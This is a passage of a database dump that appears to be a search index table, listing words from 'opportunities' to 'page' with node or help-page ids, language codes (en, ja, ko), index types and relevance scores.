('opportunities', 180, 'en', 'node_search', 2),
('opportunities', 181, 'en', 'node_search', 1),
('opportunities', 182, 'en', 'node_search', 1),
('opportunities', 183, 'en', 'node_search', 28),
('opportunities', 185, 'en', 'node_search', 1),
('opportunities', 186, 'en', 'node_search', 1),
('opportunities', 187, 'en', 'node_search', 2),
('opportunities', 190, 'en', 'node_search', 1),
('opportunities', 191, 'en', 'node_search', 1),
('opportunities', 192, 'en', 'node_search', 1),
('opportunities', 193, 'en', 'node_search', 27),
('opportunities', 195, 'en', 'node_search', 28),
('opportunities', 196, 'en', 'node_search', 1),
('opportunities', 197, 'en', 'node_search', 1),
('opportunities', 198, 'en', 'node_search', 2),
('opportunities', 199, 'en', 'node_search', 1),
('opportunity', 31, 'en', 'node_search', 0.879565),
('opportunity', 62, 'en', 'node_search', 29.8453),
('opportunity', 111, 'en', 'node_search', 1),
('opportunity', 116, 'en', 'node_search', 2),
('opportunity', 150, 'en', 'node_search', 1),
('opportunity', 162, 'en', 'node_search', 3),
('opportunity', 163, 'en', 'node_search', 6),
('opportunity', 164, 'en', 'node_search', 1),
('opportunity', 174, 'en', 'node_search', 27),
('opportunity', 187, 'en', 'node_search', 1),
('opportunity', 188, 'en', 'node_search', 1),
('opportunity', 190, 'en', 'node_search', 1),
('opportunity', 193, 'en', 'node_search', 1),
('opportunity', 194, 'en', 'node_search', 1),
('opportunity', 195, 'en', 'node_search', 1),
('opportunity', 197, 'en', 'node_search', 1),
('optimizing', 37, 'en', 'help_search', 26),
('optimizing', 37, 'ja', 'help_search', 26),
('optimizing', 37, 'ko', 'help_search', 26),
('option', 86, 'en', 'help_search', 0.993146),
('option', 86, 'ja', 'help_search', 0.993146),
('option', 86, 'ko', 'help_search', 0.993146),
('optional', 7, 'en', 'help_search', 3.8289),
('optional', 7, 'ja', 'help_search', 3.8289),
('optional', 7, 'ko', 'help_search', 3.8289),
('optional', 30, 'en', 'help_search', 4),
('optional', 30, 'ja', 'help_search', 4),
('optional', 30, 'ko', 'help_search', 4),
('optionally', 1, 'en', 'help_search', 1),
('optionally', 1, 'ja', 'help_search', 1),
('optionally', 1, 'ko', 'help_search', 1),
('optionally', 2, 'en', 'help_search', 1),
('optionally', 2, 'ja', 'help_search', 1),
('optionally', 2, 'ko', 'help_search', 1),
('optionally', 3, 'en', 'help_search', 1),
('optionally', 3, 'ja', 'help_search', 1),
('optionally', 3, 'ko', 'help_search', 1),
('optionally', 5, 'en', 'help_search', 2),
('optionally', 5, 'ja', 'help_search', 2),
('optionally', 5, 'ko', 'help_search', 2),
('optionally', 8, 'en', 'help_search', 1),
('optionally', 8, 'ja', 'help_search', 1),
('optionally', 8, 'ko', 'help_search', 1),
('optionally', 19, 'en', 'help_search', 1),
('optionally', 19, 'ja', 'help_search', 1),
('optionally', 19, 'ko', 'help_search', 1),
('optionally', 22, 'en', 'help_search', 1),
('optionally', 22, 'ja', 'help_search', 1),
('optionally', 22, 'ko', 'help_search', 1),
('optionally', 24, 'en', 'help_search', 1),
('optionally', 24, 'ja', 'help_search', 1),
('optionally', 24, 'ko', 'help_search', 1),
('optionally', 27, 'en', 'help_search', 1),
('optionally', 27, 'ja', 'help_search', 1),
('optionally', 27, 'ko', 'help_search', 1),
('optionally', 53, 'en', 'help_search', 1),
('optionally', 53, 'ja', 'help_search', 1),
('optionally', 53, 'ko', 'help_search', 1),
('optionally', 54, 'en', 'help_search', 1),
('optionally', 54, 'ja', 'help_search', 1),
('optionally', 54, 'ko', 'help_search', 1),
('optionally', 55, 'en', 'help_search', 1),
('optionally', 55, 'ja', 'help_search', 1),
('optionally', 55, 'ko', 'help_search', 1),
('optionally', 56, 'en', 'help_search', 3),
('optionally', 56, 'ja', 'help_search', 3),
('optionally', 56, 'ko', 'help_search', 3),
('optionally', 59, 'en', 'help_search', 1),
('optionally', 59, 'ja', 'help_search', 1),
('optionally', 59, 'ko', 'help_search', 1),
('optionally', 60, 'en', 'help_search', 1),
('optionally', 60, 'ja', 'help_search', 1),
('optionally', 60, 'ko', 'help_search', 1),
('optionally', 61, 'en', 'help_search', 2),
('optionally', 61, 'ja', 'help_search', 2),
('optionally', 61, 'ko', 'help_search', 2),
('optionally', 66, 'en', 'help_search', 1),
('optionally', 66, 'ja', 'help_search', 1),
('optionally', 67, 'en', 'help_search', 1),
('optionally', 67, 'ja', 'help_search', 1),
('optionally', 67, 'ko', 'help_search', 1),
('optionally', 69, 'en', 'help_search', 0.989021),
('optionally', 69, 'ja', 'help_search', 0.989021),
('optionally', 69, 'ko', 'help_search', 0.989021),
('optionally', 73, 'en', 'help_search', 1),
('optionally', 73, 'ja', 'help_search', 1),
('optionally', 73, 'ko', 'help_search', 1),
('optionally', 79, 'en', 'help_search', 3),
('optionally', 79, 'ja', 'help_search', 3),
('optionally', 79, 'ko', 'help_search', 3),
('optionally', 82, 'en', 'help_search', 1),
('optionally', 82, 'ja', 'help_search', 1),
('optionally', 82, 'ko', 'help_search', 1),
('optionally', 86, 'en', 'help_search', 0.989021),
('optionally', 86, 'ja', 'help_search', 0.989021),
('optionally', 86, 'ko', 'help_search', 0.989021),
('optionally', 88, 'en', 'help_search', 1),
('optionally', 88, 'ja', 'help_search', 1),
('optionally', 88, 'ko', 'help_search', 1),
('optionally', 90, 'en', 'help_search', 1),
('optionally', 90, 'ja', 'help_search', 1),
('optionally', 90, 'ko', 'help_search', 1),
('options', 28, 'en', 'help_search', 0.786915),
('options', 28, 'ja', 'help_search', 0.786915),
('options', 28, 'ko', 'help_search', 0.786915),
('options', 32, 'en', 'help_search', 19),
('options', 32, 'ja', 'help_search', 19),
('options', 32, 'ko', 'help_search', 19),
('options', 47, 'en', 'help_search', 19),
('options', 47, 'ja', 'help_search', 19),
('options', 47, 'ko', 'help_search', 19),
('options', 51, 'en', 'help_search', 1),
('options', 51, 'ja', 'help_search', 1),
('options', 51, 'ko', 'help_search', 1),
('options', 55, 'en', 'help_search', 1),
('options', 55, 'ja', 'help_search', 1),
('options', 55, 'ko', 'help_search', 1),
('options', 68, 'en', 'help_search', 1),
('options', 68, 'ja', 'help_search', 1),
('options', 68, 'ko', 'help_search', 1),
('options', 72, 'en', 'help_search', 0.913226),
('options', 72, 'ja', 'help_search', 0.913226),
('options', 72, 'ko', 'help_search', 0.913226),
('order', 1, 'en', 'help_search', 1),
('order', 1, 'ja', 'help_search', 1),
('order', 1, 'ko', 'help_search', 1),
('order', 6, 'en', 'node_search', 28),
('order', 7, 'en', 'help_search', 2),
('order', 7, 'ja', 'help_search', 2),
('order', 7, 'ko', 'help_search', 2),
('order', 9, 'en', 'help_search', 1),
('order', 9, 'ja', 'help_search', 1),
('order', 9, 'ko', 'help_search', 1),
('order', 17, 'en', 'help_search', 1),
('order', 17, 'ja', 'help_search', 1),
('order', 17, 'ko', 'help_search', 1),
('order', 18, 'en', 'help_search', 1),
('order', 18, 'ja', 'help_search', 1),
('order', 18, 'ko', 'help_search', 1),
('order', 23, 'en', 'help_search', 0.889397),
('order', 23, 'en', 'node_search', 0.816452),
('order', 23, 'ja', 'help_search', 0.889397),
('order', 23, 'ko', 'help_search', 0.889397),
('order', 24, 'en', 'help_search', 1),
('order', 24, 'ja', 'help_search', 1),
('order', 24, 'ko', 'help_search', 1),
('order', 25, 'en', 'help_search', 3),
('order', 25, 'ja', 'help_search', 3),
('order', 26, 'en', 'help_search', 3),
('order', 26, 'en', 'node_search', 1),
('order', 26, 'ja', 'help_search', 3),
('order', 26, 'ko', 'help_search', 3),
('order', 27, 'en', 'help_search', 1),
('order', 27, 'ja', 'help_search', 1),
('order', 27, 'ko', 'help_search', 1),
('order', 28, 'en', 'help_search', 5.02459),
('order', 28, 'ja', 'help_search', 5.02459),
('order', 28, 'ko', 'help_search', 5.02459),
('order', 38, 'en', 'help_search', 1),
('order', 38, 'ja', 'help_search', 1),
('order', 38, 'ko', 'help_search', 1),
('order', 39, 'en', 'help_search', 2),
('order', 39, 'ja', 'help_search', 2),
('order', 39, 'ko', 'help_search', 2),
('order', 42, 'en', 'help_search', 2),
('order', 42, 'ja', 'help_search', 2),
('order', 42, 'ko', 'help_search', 2),
('order', 45, 'en', 'help_search', 1),
('order', 45, 'ja', 'help_search', 1),
('order', 45, 'ko', 'help_search', 1),
('order', 48, 'en', 'help_search', 2),
('order', 48, 'ja', 'help_search', 2),
('order', 48, 'ko', 'help_search', 2),
('order', 50, 'en', 'help_search', 1.98902),
('order', 50, 'ja', 'help_search', 1.98902),
('order', 50, 'ko', 'help_search', 1.98902),
('order', 56, 'en', 'help_search', 2),
('order', 56, 'ja', 'help_search', 2),
('order', 56, 'ko', 'help_search', 2),
('order', 58, 'en', 'help_search', 2),
('order', 58, 'ja', 'help_search', 2),
('order', 58, 'ko', 'help_search', 2),
('order', 61, 'en', 'help_search', 1),
('order', 61, 'ja', 'help_search', 1),
('order', 61, 'ko', 'help_search', 1),
('order', 68, 'en', 'help_search', 0.876337),
('order', 68, 'ja', 'help_search', 0.876337),
('order', 68, 'ko', 'help_search', 0.876337),
('order', 69, 'en', 'help_search', 0.961087),
('order', 69, 'ja', 'help_search', 0.961087),
('order', 69, 'ko', 'help_search', 0.961087),
('order', 89, 'en', 'help_search', 1),
('order', 89, 'ja', 'help_search', 1),
('order', 89, 'ko', 'help_search', 1),
('order', 91, 'en', 'help_search', 1),
('order', 91, 'ja', 'help_search', 1),
('order', 91, 'ko', 'help_search', 1),
('order', 93, 'en', 'help_search', 2.98087),
('order', 93, 'ja', 'help_search', 2.98087),
('order', 93, 'ko', 'help_search', 2.98087),
('ordered', 28, 'en', 'help_search', 1),
('ordered', 28, 'ja', 'help_search', 1),
('ordered', 28, 'ko', 'help_search', 1),
('ordering', 1, 'en', 'help_search', 1),
('ordering', 1, 'ja', 'help_search', 1),
('ordering', 1, 'ko', 'help_search', 1),
('ordering', 42, 'en', 'help_search', 1),
('ordering', 42, 'ja', 'help_search', 1),
('ordering', 42, 'ko', 'help_search', 1),
('organization', 26, 'en', 'node_search', 1),
('organization', 26, 'ja', 'node_search', 1),
('organize', 80, 'en', 'help_search', 1),
('organize', 80, 'ja', 'help_search', 1),
('organize', 80, 'ko', 'help_search', 1),
('organized', 6, 'en', 'help_search', 1),
('organized', 6, 'ja', 'help_search', 1),
('organized', 6, 'ko', 'help_search', 1),
('organizes', 68, 'en', 'help_search', 1),
('organizes', 68, 'ja', 'help_search', 1),
('organizes', 68, 'ko', 'help_search', 1),
('original', 37, 'en', 'help_search', 1),
('original', 37, 'ja', 'help_search', 1),
('original', 37, 'ko', 'help_search', 1),
('other', 2, 'en', 'help_search', 1),
('other', 2, 'ja', 'help_search', 1),
('other', 2, 'ko', 'help_search', 1),
('other', 6, 'en', 'help_search', 2),
('other', 6, 'ja', 'help_search', 2),
('other', 6, 'ko', 'help_search', 2),
('other', 8, 'en', 'node_search', 2),
('other', 11, 'en', 'help_search', 4.88282),
('other', 11, 'ja', 'help_search', 4.88282),
('other', 11, 'ko', 'help_search', 4.88282),
('other', 13, 'en', 'help_search', 1),
('other', 13, 'ja', 'help_search', 1),
('other', 13, 'ko', 'help_search', 1),
('other', 15, 'en', 'help_search', 1),
('other', 15, 'ja', 'help_search', 1),
('other', 15, 'ko', 'help_search', 1),
('other', 17, 'en', 'help_search', 1),
('other', 17, 'ja', 'help_search', 1),
('other', 17, 'ko', 'help_search', 1),
('other', 19, 'en', 'help_search', 1),
('other', 19, 'ja', 'help_search', 1),
('other', 19, 'ko', 'help_search', 1),
('other', 20, 'en', 'help_search', 1),
('other', 20, 'ja', 'help_search', 1),
('other', 20, 'ko', 'help_search', 1),
('other', 23, 'en', 'help_search', 2),
('other', 23, 'en', 'node_search', 1),
('other', 23, 'ja', 'help_search', 2),
('other', 23, 'ko', 'help_search', 2),
('other', 24, 'en', 'node_search', 1.45666),
('other', 27, 'en', 'help_search', 4),
('other', 27, 'en', 'node_search', 1.61864),
('other', 27, 'ja', 'help_search', 4),
('other', 27, 'ko', 'help_search', 4),
('other', 29, 'en', 'help_search', 5),
('other', 29, 'ja', 'help_search', 5),
('other', 29, 'ko', 'help_search', 5),
('other', 30, 'en', 'help_search', 0.716357),
('other', 30, 'ja', 'help_search', 0.716357),
('other', 30, 'ko', 'help_search', 0.716357),
('other', 31, 'en', 'node_search', 1),
('other', 31, 'ja', 'help_search', 5.07468),
('other', 35, 'en', 'help_search', 1),
('other', 35, 'ja', 'help_search', 1),
('other', 35, 'ko', 'help_search', 1),
('other', 37, 'en', 'help_search', 2),
('other', 37, 'ja', 'help_search', 2),
('other', 37, 'ko', 'help_search', 2),
('other', 41, 'en', 'help_search', 1),
('other', 41, 'ja', 'help_search', 1),
('other', 41, 'ko', 'help_search', 1),
('other', 42, 'en', 'help_search', 1),
('other', 42, 'ja', 'help_search', 1),
('other', 42, 'ko', 'help_search', 1),
('other', 44, 'en', 'help_search', 5),
('other', 44, 'ja', 'help_search', 5),
('other', 44, 'ko', 'help_search', 5),
('other', 46, 'en', 'help_search', 1),
('other', 46, 'ja', 'help_search', 1),
('other', 46, 'ko', 'help_search', 1),
('other', 54, 'en', 'help_search', 1),
('other', 54, 'ja', 'help_search', 1),
('other', 54, 'ko', 'help_search', 1),
('other', 59, 'en', 'help_search', 1),
('other', 59, 'ja', 'help_search', 1),
('other', 59, 'ko', 'help_search', 1),
('other', 61, 'en', 'help_search', 1.98493),
('other', 61, 'ja', 'help_search', 1.98493),
('other', 61, 'ko', 'help_search', 1.98493),
('other', 62, 'en', 'help_search', 3),
('other', 62, 'ja', 'help_search', 3),
('other', 62, 'ko', 'help_search', 3),
('other', 65, 'en', 'help_search', 1),
('other', 65, 'ja', 'help_search', 1),
('other', 65, 'ko', 'help_search', 1),
('other', 68, 'en', 'help_search', 1),
('other', 68, 'ja', 'help_search', 1),
('other', 68, 'ko', 'help_search', 1),
('other', 69, 'en', 'help_search', 1),
('other', 69, 'ja', 'help_search', 1),
('other', 69, 'ko', 'help_search', 1),
('other', 71, 'en', 'help_search', 1),
('other', 71, 'ja', 'help_search', 1),
('other', 71, 'ko', 'help_search', 1),
('other', 72, 'en', 'help_search', 19.9132),
('other', 72, 'ja', 'help_search', 19.9132),
('other', 72, 'ko', 'help_search', 19.9132),
('other', 75, 'en', 'help_search', 1),
('other', 75, 'ja', 'help_search', 1),
('other', 75, 'ko', 'help_search', 1),
('other', 80, 'en', 'help_search', 2),
('other', 80, 'ja', 'help_search', 2),
('other', 80, 'ko', 'help_search', 2),
('other', 82, 'en', 'help_search', 1),
('other', 82, 'ja', 'help_search', 1),
('other', 82, 'ko', 'help_search', 1),
('other', 86, 'en', 'help_search', 0.980874),
('other', 86, 'ja', 'help_search', 0.980874),
('other', 86, 'ko', 'help_search', 0.980874),
('other', 88, 'en', 'help_search', 1),
('other', 88, 'ja', 'help_search', 1),
('other', 88, 'ko', 'help_search', 1),
('other', 90, 'en', 'help_search', 1),
('other', 90, 'ja', 'help_search', 1),
('other', 90, 'ko', 'help_search', 1),
('other', 92, 'en', 'help_search', 1),
('other', 92, 'ja', 'help_search', 1),
('other', 92, 'ko', 'help_search', 1),
('other', 93, 'en', 'help_search', 1),
('other', 93, 'ja', 'help_search', 1),
('other', 93, 'ko', 'help_search', 1),
('others', 170, 'en', 'node_search', 1),
('others', 188, 'en', 'node_search', 1),
('others', 189, 'en', 'node_search', 1),
('our', 1, 'en', 'node_search', 18),
('our', 23, 'en', 'node_search', 2.81367),
('our', 24, 'en', 'node_search', 27),
('our', 25, 'en', 'node_search', 39),
('our', 26, 'en', 'node_search', 1),
('our', 27, 'en', 'node_search', 7.30458),
('our', 62, 'en', 'node_search', 30),
('our', 66, 'en', 'node_search', 1.9347),
('our', 67, 'ja', 'node_search', 1),
('our', 133, 'en', 'node_search', 3),
('our', 135, 'en', 'node_search', 3),
('our', 136, 'en', 'node_search', 3),
('our', 138, 'en', 'node_search', 1),
('our', 142, 'en', 'node_search', 2),
('our', 155, 'en', 'node_search', 1),
('our', 156, 'en', 'node_search', 1),
('our', 160, 'en', 'node_search', 1),
('our', 161, 'en', 'node_search', 1),
('our', 164, 'en', 'node_search', 1),
('our', 165, 'en', 'node_search', 1),
('our', 166, 'en', 'node_search', 1),
('our', 168, 'en', 'node_search', 1),
('our', 170, 'en', 'node_search', 1),
('our', 171, 'en', 'node_search', 1),
('our', 177, 'en', 'node_search', 1),
('our', 179, 'en', 'node_search', 1),
('our', 189, 'en', 'node_search', 1),
('our', 193, 'en', 'node_search', 1),
('our', 195, 'en', 'node_search', 1),
('our', 198, 'en', 'node_search', 1),
('out', 1, 'en', 'node_search', 1),
('out', 6, 'en', 'help_search', 1),
('out', 6, 'ja', 'help_search', 1),
('out', 6, 'ko', 'help_search', 1),
('out', 17, 'en', 'help_search', 1),
('out', 17, 'ja', 'help_search', 1),
('out', 17, 'ko', 'help_search', 1),
('out', 20, 'en', 'help_search', 1),
('out', 20, 'ja', 'help_search', 1),
('out', 20, 'ko', 'help_search', 1),
('out', 23, 'en', 'node_search', 1),
('out', 27, 'en', 'node_search', 1),
('out', 37, 'en', 'help_search', 0.927431),
('out', 37, 'ja', 'help_search', 0.927431),
('out', 37, 'ko', 'help_search', 0.927431),
('out', 53, 'en', 'help_search', 1),
('out', 53, 'ja', 'help_search', 1),
('out', 53, 'ko', 'help_search', 1),
('out', 66, 'en', 'node_search', 1),
('out', 84, 'en', 'help_search', 1),
('out', 84, 'ja', 'help_search', 1),
('out', 84, 'ko', 'help_search', 1),
('outdoor', 66, 'en', 'node_search', 1),
('outline', 22, 'en', 'help_search', 1),
('outline', 22, 'ja', 'help_search', 1),
('outline', 22, 'ko', 'help_search', 1),
('output', 6, 'en', 'help_search', 1),
('output', 6, 'ja', 'help_search', 1),
('output', 6, 'ko', 'help_search', 1),
('output', 23, 'en', 'help_search', 1),
('output', 23, 'ja', 'help_search', 1),
('output', 23, 'ko', 'help_search', 1),
('output', 37, 'en', 'help_search', 1.97685),
('output', 37, 'ja', 'help_search', 1.97685),
('output', 37, 'ko', 'help_search', 1.97685),
('output', 93, 'en', 'help_search', 5),
('output', 93, 'ja', 'help_search', 5),
('output', 93, 'ko', 'help_search', 5),
('outside', 32, 'en', 'help_search', 5.99731),
('outside', 32, 'ja', 'help_search', 5.99731),
('outside', 32, 'ko', 'help_search', 5.99731),
('outside', 36, 'en', 'help_search', 1),
('outside', 36, 'ja', 'help_search', 1),
('outside', 36, 'ko', 'help_search', 1),
('outside', 80, 'en', 'help_search', 1),
('outside', 80, 'ja', 'help_search', 1),
('outside', 80, 'ko', 'help_search', 1),
('outstanding', 182, 'en', 'node_search', 1),
('outstanding', 186, 'en', 'node_search', 1),
('over', 19, 'en', 'node_search', 28),
('over', 19, 'ko', 'node_search', 28),
('over', 22, 'en', 'help_search', 1),
('over', 22, 'ja', 'help_search', 1),
('over', 22, 'ko', 'help_search', 1),
('over', 23, 'en', 'help_search', 0.916736),
('over', 23, 'en', 'node_search', 0.945829),
('over', 23, 'ja', 'help_search', 0.916736),
('over', 23, 'ko', 'help_search', 0.916736),
('over', 31, 'en', 'node_search', 0.993146),
('over', 39, 'en', 'help_search', 1),
('over', 39, 'ja', 'help_search', 1),
('over', 39, 'ko', 'help_search', 1),
('over', 56, 'en', 'help_search', 1),
('over', 56, 'ja', 'help_search', 1),
('over', 56, 'ko', 'help_search', 1),
('over', 133, 'en', 'node_search', 1),
('over', 142, 'en', 'node_search', 1),
('overall', 29, 'en', 'help_search', 0.993146),
('overall', 29, 'ja', 'help_search', 0.993146),
('overall', 29, 'ko', 'help_search', 0.993146),
('overall', 67, 'en', 'help_search', 0.892724),
('overall', 67, 'ja', 'help_search', 0.892724),
('overall', 67, 'ko', 'help_search', 0.892724),
('override', 1, 'en', 'help_search', 4),
('override', 1, 'ja', 'help_search', 4),
('override', 1, 'ko', 'help_search', 4),
('override', 30, 'en', 'help_search', 0.920273),
('override', 30, 'ja', 'help_search', 0.920273),
('override', 30, 'ko', 'help_search', 0.920273),
('overseas', 3, 'en', 'node_search', 0.98493),
('overseas', 3, 'ko', 'node_search', 0.976851),
('overseas', 23, 'en', 'node_search', 1),
('overseas', 23, 'ko', 'node_search', 1),
('overseas', 25, 'en', 'node_search', 1),
('overseas', 167, 'en', 'node_search', 1),
('overseas', 184, 'en', 'node_search', 1),
('oversee', 142, 'en', 'node_search', 1),
('overtime', 5, 'en', 'node_search', 2),
('overtime', 5, 'ko', 'node_search', 2),
('overtime', 8, 'en', 'node_search', 2),
('overtime', 8, 'ko', 'node_search', 2),
('overtime', 31, 'en', 'node_search', 1),
('overtime', 162, 'en', 'node_search', 0.976851),
('overview', 2, 'en', 'help_search', 19),
('overview', 2, 'ja', 'help_search', 19),
('overview', 2, 'ko', 'help_search', 19),
('overview', 6, 'en', 'help_search', 18.6366),
('overview', 6, 'ja', 'help_search', 18.6366),
('overview', 6, 'ko', 'help_search', 18.6366),
('overview', 10, 'en', 'help_search', 4),
('overview', 10, 'ja', 'help_search', 4),
('overview', 10, 'ko', 'help_search', 4),
('overview', 11, 'en', 'help_search', 17.2851),
('overview', 11, 'ja', 'help_search', 17.2851),
('overview', 11, 'ko', 'help_search', 17.2851),
('overview', 24, 'en', 'help_search', 3),
('overview', 24, 'ja', 'help_search', 3),
('overview', 24, 'ko', 'help_search', 3),
('overview', 29, 'en', 'help_search', 19),
('overview', 29, 'ja', 'help_search', 19),
('overview', 29, 'ko', 'help_search', 19),
('overview', 30, 'en', 'help_search', 14.1606),
('overview', 30, 'ja', 'help_search', 14.1606),
('overview', 30, 'ko', 'help_search', 14.1606),
('overview', 33, 'en', 'help_search', 19),
('overview', 33, 'ja', 'help_search', 19),
('overview', 33, 'ko', 'help_search', 19),
('overview', 34, 'en', 'help_search', 19),
('overview', 34, 'ja', 'help_search', 19),
('overview', 34, 'ko', 'help_search', 19),
('overview', 35, 'en', 'help_search', 19),
('overview', 35, 'ja', 'help_search', 19),
('overview', 35, 'ko', 'help_search', 19),
('overview', 36, 'en', 'help_search', 19),
('overview', 36, 'ja', 'help_search', 19),
('overview', 36, 'ko', 'help_search', 19),
('overview', 40, 'en', 'help_search', 19),
('overview', 40, 'ja', 'help_search', 19),
('overview', 40, 'ko', 'help_search', 19),
('overview', 41, 'en', 'help_search', 19),
('overview', 41, 'ja', 'help_search', 19),
('overview', 41, 'ko', 'help_search', 19),
('overview', 42, 'en', 'help_search', 19),
('overview', 42, 'ja', 'help_search', 19),
('overview', 42, 'ko', 'help_search', 19),
('overview', 43, 'en', 'help_search', 17.7735),
('overview', 43, 'ja', 'help_search', 17.7735),
('overview', 43, 'ko', 'help_search', 17.7735),
('overview', 48, 'en', 'help_search', 1),
('overview', 48, 'ja', 'help_search', 1),
('overview', 48, 'ko', 'help_search', 1),
('overview', 54, 'en', 'help_search', 1),
('overview', 54, 'ja', 'help_search', 1),
('overview', 54, 'ko', 'help_search', 1),
('overview', 59, 'en', 'help_search', 4),
('overview', 59, 'ja', 'help_search', 4),
('overview', 59, 'ko', 'help_search', 4),
('overview', 61, 'en', 'help_search', 4),
('overview', 61, 'ja', 'help_search', 4),
('overview', 61, 'ko', 'help_search', 4),
('overview', 62, 'en', 'help_search', 19),
('overview', 62, 'ja', 'help_search', 19),
('overview', 62, 'ko', 'help_search', 19),
('overview', 65, 'en', 'help_search', 19),
('overview', 65, 'ja', 'help_search', 19),
('overview', 65, 'ko', 'help_search', 19),
('overview', 68, 'en', 'help_search', 16.7117),
('overview', 68, 'ja', 'help_search', 16.7117),
('overview', 68, 'ko', 'help_search', 16.7117),
('overview', 80, 'en', 'help_search', 18.1873),
('overview', 80, 'ja', 'help_search', 18.1873),
('overview', 80, 'ko', 'help_search', 18.1873),
('overview', 84, 'en', 'help_search', 19),
('overview', 84, 'ja', 'help_search', 19),
('overview', 84, 'ko', 'help_search', 19),
('overview', 92, 'en', 'help_search', 1),
('overview', 92, 'ja', 'help_search', 1),
('overview', 92, 'ko', 'help_search', 1),
('overview', 93, 'en', 'help_search', 15.2523),
('overview', 93, 'ja', 'help_search', 15.2523),
('overview', 93, 'ko', 'help_search', 15.2523),
('own', 7, 'en', 'help_search', 0.927431),
('own', 7, 'ja', 'help_search', 0.927431),
('own', 7, 'ko', 'help_search', 0.927431),
('own', 11, 'en', 'help_search', 2),
('own', 11, 'ja', 'help_search', 2),
('own', 11, 'ko', 'help_search', 2),
('own', 20, 'en', 'help_search', 1),
('own', 20, 'ja', 'help_search', 1),
('own', 20, 'ko', 'help_search', 1),
('own', 29, 'en', 'help_search', 1),
('own', 29, 'ja', 'help_search', 1),
('own', 29, 'ko', 'help_search', 1),
('own', 30, 'en', 'help_search', 1),
('own', 30, 'ja', 'help_search', 1),
('own', 30, 'ko', 'help_search', 1),
('own', 59, 'en', 'help_search', 1),
('own', 59, 'ja', 'help_search', 1),
('own', 59, 'ko', 'help_search', 1),
('own', 61, 'en', 'help_search', 5),
('own', 61, 'ja', 'help_search', 5),
('own', 61, 'ko', 'help_search', 5),
('own', 62, 'en', 'help_search', 1),
('own', 62, 'ja', 'help_search', 1),
('own', 62, 'ko', 'help_search', 1),
('own', 72, 'en', 'help_search', 1),
('own', 72, 'ja', 'help_search', 1),
('own', 72, 'ko', 'help_search', 1),
('own', 77, 'en', 'node_search', 4),
('own', 87, 'en', 'node_search', 1),
('own', 162, 'en', 'node_search', 1),
('owned', 30, 'en', 'help_search', 0.938382),
('owned', 30, 'ja', 'help_search', 0.938382),
('owned', 30, 'ko', 'help_search', 0.938382),
('page', 2, 'en', 'help_search', 1),
('page', 2, 'ja', 'help_search', 1),
('page', 2, 'ko', 'help_search', 1),
('page', 5, 'en', 'help_search', 1),
('page', 5, 'ja', 'help_search', 1),
('page', 5, 'ko', 'help_search', 1),
('page', 7, 'en', 'help_search', 12.918),
('page', 7, 'ja', 'help_search', 12.918),
('page', 7, 'ko', 'help_search', 12.918),
('page', 10, 'en', 'help_search', 5),
('page', 10, 'ja', 'help_search', 5),
('page', 10, 'ko', 'help_search', 5),
('page', 14, 'en', 'help_search', 1),
('page', 14, 'ja', 'help_search', 1),
('page', 14, 'ko', 'help_search', 1),
('page', 16, 'en', 'help_search', 1),
('page', 16, 'ja', 'help_search', 1),
('page', 16, 'ko', 'help_search', 1),
('page', 17, 'en', 'help_search', 1),
('page', 17, 'ja', 'help_search', 1),
('page', 17, 'ko', 'help_search', 1),
('page', 21, 'en', 'help_search', 11),
('page', 21, 'ja', 'help_search', 11),
('page', 21, 'ko', 'help_search', 11),
('page', 22, 'en', 'help_search', 9.93833),
('page', 22, 'ja', 'help_search', 9.93833),
('page', 22, 'ko', 'help_search', 9.93833),
('page', 24, 'en', 'help_search', 3),
('page', 24, 'ja', 'help_search', 3),
('page', 24, 'ko', 'help_search', 3),
('page', 25, 'en', 'help_search', 2),
('page', 25, 'ja', 'help_search', 2),
('page', 26, 'en', 'help_search', 1),
('page', 26, 'ja', 'help_search', 1),
('page', 26, 'ko', 'help_search', 1),
('page', 27, 'en', 'help_search', 3),
('page', 27, 'ja', 'help_search', 3),
('page', 27, 'ko', 'help_search', 3),
('page', 28, 'en', 'help_search', 1.72506),
('page', 28, 'ja', 'help_search', 1.72506),
('page', 28, 'ko', 'help_search', 1.72506),
('page', 29, 'en', 'help_search', 22),
('page', 29, 'ja', 'help_search', 22),
('page', 29, 'ko', 'help_search', 22),
('page', 32, 'en', 'help_search', 1),
('page', 32, 'ja', 'help_search', 1),
('page', 32, 'ko', 'help_search', 1),
('page', 33, 'en', 'help_search', 11),
('page', 33, 'ja', 'help_search', 11),
('page', 33, 'ko', 'help_search', 11),
('page', 37, 'en', 'help_search', 27.055),
('page', 37, 'ja', 'help_search', 27.055),
('page', 37, 'ko', 'help_search', 27.055),
('page', 38, 'en', 'help_search', 1),
('page', 38, 'ja', 'help_search', 1),
('page', 38, 'ko', 'help_search', 1),
('page', 39, 'en', 'help_search', 4),
('page', 39, 'ja', 'help_search', 4),
('page', 39, 'ko', 'help_search', 4),
('page', 42, 'en', 'help_search', 1),
('page', 42, 'ja', 'help_search', 1),
('page', 42, 'ko', 'help_search', 1),
('page', 43, 'en', 'help_search', 1),
('page', 43, 'ja', 'help_search', 1),
('page', 43, 'ko', 'help_search', 1),
('page', 45, 'en', 'help_search', 7),
('page', 45, 'ja', 'help_search', 7),
('page', 45, 'ko', 'help_search', 7),
('page', 46, 'en', 'help_search', 5.9522),
('page', 46, 'ja', 'help_search', 5.9522),
('page', 46, 'ko', 'help_search', 5.9522),
('page', 47, 'en', 'help_search', 2),
('page', 47, 'ja', 'help_search', 2),
('page', 47, 'ko', 'help_search', 2),
('page', 48, 'en', 'help_search', 1),
('page', 48, 'ja', 'help_search', 1),
('page', 48, 'ko', 'help_search', 1),
('page', 49, 'en', 'help_search', 1),
('page', 49, 'ja', 'help_search', 1),
('page', 49, 'ko', 'help_search', 1),
('page', 56, 'en', 'help_search', 3),
('page', 56, 'ja', 'help_search', 3),
('page', 56, 'ko', 'help_search', 3),
('page', 57, 'en', 'help_search', 2),
('page', 57, 'ja', 'help_search', 2),
('page', 57, 'ko', 'help_search', 2),
('page', 59, 'en', 'help_search', 19),
('page', 59, 'ja', 'help_search', 19),
('page', 59, 'ko', 'help_search', 19),
('page', 60, 'en', 'help_search', 2),
('page', 60, 'ja', 'help_search', 2),
('page', 60, 'ko', 'help_search', 2),
('page', 61, 'en', 'help_search', 15.4874),
('page', 61, 'ja', 'help_search', 15.4874),
('page', 61, 'ko', 'help_search', 15.4874),
('page', 63, 'en', 'help_search', 3),
('page', 63, 'ja', 'help_search', 3),
('page', 63, 'ko', 'help_search', 3),
('page', 64, 'en', 'help_search', 2),
('page', 64, 'ja', 'help_search', 2),
('page', 64, 'ko', 'help_search', 2),
('page', 65, 'en', 'help_search', 7),
